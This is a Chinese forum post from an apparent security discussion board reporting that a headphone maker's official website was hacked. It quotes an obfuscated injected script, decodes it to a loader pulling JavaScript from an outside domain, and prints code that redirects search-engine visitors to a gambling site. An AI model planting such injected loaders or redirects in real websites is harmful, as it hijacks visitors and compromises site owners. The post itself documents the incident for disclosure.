V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
wjhjd163
V2EX  ›  信息安全

西伯利亚耳机官网被劫持

  •  
  •   wjhjd163 · 2019-08-30 17:13:34 +08:00 · 3025 次点击
    这是一个创建于 1672 天前的主题,其中的信息可能已经有所发展或是发生改变。

    坐标 四川成都 电信 西伯利亚耳机官网: http://www.xiberia.net/ 官网首页 第 8 行:

    <script type="text/javascript"> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('n["\\o\\e\\1\\d\\i\\8\\m\\0"]["\\l\\3\\7\\0\\8"](\'\\j\\2\\1\\3\\7\\4\\0 \\0\\r\\4\\8\\b\\6\\0\\8\\k\\0\\5\\g\\c\\s\\c\\2\\1\\3\\7\\4\\0\\6 \\2\\3\\1\\b\\6\\9\\0\\0\\4\\2\\q\\5\\5\\2\\a\\9\\d\\a\\9\\p\\f\\1\\e\\i\\5\\1\\k\\1\\f\\g\\2\\6\\h\\j\\5\\2\\1\\3\\7\\4\\0\\h\');',29,29,'x74|x63|x73|x72|x70|x2f|x22|x69|x65|x68|x66|x3d|x61|x75|x6f|x2e|x6a|x3e|x6d|x3c|x78|x77|x6e|window|x64|x32|x3a|x79|x76'.split('|'),0,{})) </script>

    解密后结果: < script type = "text/javascript" > window["document"]["write"]('<script src="https://sfhufh2.com/cxc.js" type="text/javascript"></script>'); < /script>

    对应 js 文件: var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?5389c7fc17035dfab2ade749b0b79e96"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); (function () { /百度推送代码/ var bp = document.createElement('script'); bp.src = '//push.zhanzhang.baidu.com/push.js'; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); /360 推送代码/ var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9'; document.write('<script id="sozz" src="' + src + '"></script>'); })();</p> <p>document.writeln("<script LANGUAGE="Javascript">"); document.writeln("var s=document.referrer"); document.writeln("if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )"); document.writeln("location.href="https://tz33720.com/";"); document.writeln("</script>");

    很明显,如果从搜索引擎访问就会被重定向至 https://tz33720.com/ 是一个赌博网站

    通过其他监测软件在全国节点查询可得是站点本身被黑。

    目前尚无回复
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   1148 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 22:59 · PVG 06:59 · LAX 15:59 · JFK 18:59
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.